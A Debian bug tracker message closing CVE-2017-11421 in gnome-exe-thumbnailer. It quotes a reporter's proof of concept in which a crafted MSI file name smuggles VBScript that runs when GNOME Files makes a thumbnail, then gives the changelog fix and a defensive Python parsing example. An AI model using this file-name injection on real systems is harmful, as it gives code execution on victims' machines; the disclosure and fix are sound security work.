
[pkg-wine-party] Bug#868705: marked as done (gnome-exe-thumbnailer: CVE-2017-11421: Thumbnail generation for MSI files executes arbitrary VBScript)



Your message dated Tue, 18 Jul 2017 19:51:04 +0000
with message-id <E1dXYWO-0000W4-LY@fasolo.debian.org>
and subject line Bug#868705: fixed in gnome-exe-thumbnailer 0.9.5-1
has caused the Debian Bug report #868705,
regarding gnome-exe-thumbnailer: CVE-2017-11421: Thumbnail generation for MSI files executes arbitrary VBScript
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact owner@bugs.debian.org
immediately.)


-- 
868705: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=868705
Debian Bug Tracking System
Contact owner@bugs.debian.org with problems
--- Begin Message ---
Package: gnome-exe-thumbnailer
Version: 0.9.4-2
Severity: grave
Tags: security
Justification: user security hole

Dear Maintainer,

the following PoC is copied verbatim from my post about the parsing issue:
http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html

Proof of Concept

Install Dependencies

On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer.

If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host.

Create MSI Files

Create a file named poc.xml with the following content:

<?xml version="1.0" encoding="utf-8"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Version="1.0"/>
</Wix>

Execute the following Bourne Shell code:

wixl -o poc.msi poc.xml
cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"

Trigger Execution

Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.



-- System Information:
Debian Release: 9.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)

Versions of packages gnome-exe-thumbnailer depends on:
ii  icoutils                         0.31.2-1.1
ii  imagemagick                      8:6.9.7.4+dfsg-11
ii  imagemagick-6.q16 [imagemagick]  8:6.9.7.4+dfsg-11
ii  libglib2.0-bin                   2.50.3-2

Versions of packages gnome-exe-thumbnailer recommends:
pn  wine                                                                 <none>
pn  wine64-tools | wine32-tools | wine64-development-tools | wine32-dev  <none>

gnome-exe-thumbnailer suggests no packages.

-- no debconf information

--- End Message ---
--- Begin Message ---
Source: gnome-exe-thumbnailer
Source-Version: 0.9.5-1

We believe that the bug you reported is fixed in the latest version of
gnome-exe-thumbnailer, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 868705@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
James Lu <bitflip3@gmail.com> (supplier of updated gnome-exe-thumbnailer package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Tue, 18 Jul 2017 08:18:48 +0800
Source: gnome-exe-thumbnailer
Binary: gnome-exe-thumbnailer
Architecture: source
Version: 0.9.5-1
Distribution: unstable
Urgency: high
Maintainer: Debian Wine Party <pkg-wine-party@lists.alioth.debian.org>
Changed-By: James Lu <bitflip3@gmail.com>
Description:
 gnome-exe-thumbnailer - Wine .exe and other executable thumbnailer for GNOME
Closes: 868705
Changes:
 gnome-exe-thumbnailer (0.9.5-1) unstable; urgency=high
 .
   [ Stephen Kitt ]
   * Fix the filename mangling in debian/watch.
 .
   [ James Lu ]
   * New upstream release.
     - Switch to msitools' msiinfo for ProductVersion fetching, replacing the
       insecure VBScript-based parsing as described at
       http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
       (Closes: #868705; LP: #651610; CVE-2017-11421).
   * Add Enhances: caja, tumbler (>= 0.1.92~), nautilus, nemo
     These are some of the many file managers/thumbnailer programs that support
     desktop thumbnailers like exe-thumbnailer, and I have verified (at some
     point) that all of these work.
   * fallback-thumbnail-limit.patch: drop, applied upstream.
   * Bump Standards-Version to 4.0.0; no changes needed.
   * Add msitools to recommends; it is used to fetch .msi version info.


--- End Message ---
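A defender-side counterpart to the PoC in the first message and to the changelog's fix (replacing the VBScript-based parsing with msitools' msiinfo): this is an added example in Python, not code from gnome-exe-thumbnailer or from the reporter. It assumes that `msiinfo export <file> Property` prints the Property table in the Windows Installer .idt text layout (the sample output below is constructed, not captured), and it shows the two things that matter here: the file name travels as one argv element instead of being spliced into a script, and the value read back is validated before anything downstream uses it.

```python
import re
import subprocess

# Constructed sample of what `msiinfo export poc.msi Property` is assumed to
# print (.idt layout): column names, column types, table name, then rows.
SAMPLE_PROPERTY_TABLE = (
    "Property\tValue\n"
    "s72\tl0\n"
    "Property\tProperty\n"
    "Manufacturer\tExample Corp\n"
    "ProductVersion\t1.0\n"
    "ProductName\tpoc\n"
)

# Only digits and dots, at most four components, may reach the thumbnail text.
VERSION_RE = re.compile(r"^\d{1,5}(\.\d{1,5}){0,3}$")


def parse_product_version(idt_text):
    """Return a validated ProductVersion from .idt-style table text, else None."""
    lines = idt_text.splitlines()
    # Third line names the table; refuse anything that is not the Property table.
    if len(lines) < 3 or lines[2].split("\t")[0] != "Property":
        return None
    for row in lines[3:]:
        fields = row.split("\t")
        if len(fields) >= 2 and fields[0] == "ProductVersion":
            value = fields[1].strip()
            # A hostile or malformed value is dropped rather than passed on.
            return value if VERSION_RE.match(value) else None
    return None


def msi_product_version(path, runner=subprocess.run):
    """Fetch ProductVersion from an MSI without executing any script.

    The path is one argv element (no shell, no interpolation into VBScript),
    so a file name containing quotes or colons is just a file name.
    `runner` is injectable so the parsing can be exercised without msitools.
    """
    proc = runner(["msiinfo", "export", path, "Property"],
                  capture_output=True, text=True, check=False)
    if proc.returncode != 0:
        return None
    return parse_product_version(proc.stdout)
```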
